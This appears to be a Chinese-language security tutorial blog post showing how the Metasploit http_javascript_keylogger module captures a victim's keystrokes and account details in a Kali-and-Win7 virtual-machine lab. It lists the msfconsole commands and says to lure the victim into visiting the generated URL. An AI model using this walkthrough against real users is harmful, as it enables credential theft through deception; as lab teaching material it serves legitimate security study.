网络安全工程师演示：原来***是这样获取你键盘的全部输入信息的！

课前声明：
一、本分享仅作学习交流，请自觉遵照法律法规！
二、搜索：Kali 与编程，学习更多网络***干货！
三、Kali 与编程天天准时更新，敬请学习和关注！
正文部分
1、背景介绍
Metasploit就是一个漏洞框架。它的全称叫作The Metasploit Framework，简称叫作MSF。Metasploit做为全球最受欢迎的工具，不单单是由于它的方便性和强大性，更重要的是它的框架。它容许使用者开发本身的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用***控制受害者主机呢？接下来让咱们一块儿学习！
2、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3、战略安排
3.1 查看postgresql数据库服务是否开启，以下图所示。
命令：service postgresql status

3.2 将postgresql数据库服务设置为开机自启动，以下图所示。
命令：update-rc.d postgresql enable

3.3 启动Metasploit（msf）***测试框架，以下图所示。
命令：msfconsole

步骤1：成功进入Metasploit***框架，以下图所示。

步骤2：检索对应的漏洞信息，以下图所示。
命令：search keylogger

步骤3：利用相对应的漏洞利用模块，以下图所示。
命令：use auxiliary/server/capture/http_javascript_keylogger

步骤4：查看对应的***参数，以下图所示。
命令：show options

步骤5：设置对应的参数，以下图所示。
命令：set demo true

命令：set uripath /

3.4 运行漏洞利用模块，以下图所示。
命令：run

3.5 诱导受害者主机对生成的URL进行访问，进入以下页面，输入对应的帐户信息，以下图所示。

3.6 在Kali Linux页面实时监控受害者的实时输入信息，以下图所示，成功获取受害者的帐户信息。

小编一个个字敲打创做，可辛苦了，问君能否关注一下我呢？你还可搜索:Kali与编程，学习更多******技巧呢 ！拒绝盗版，转载请声明来源：Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧！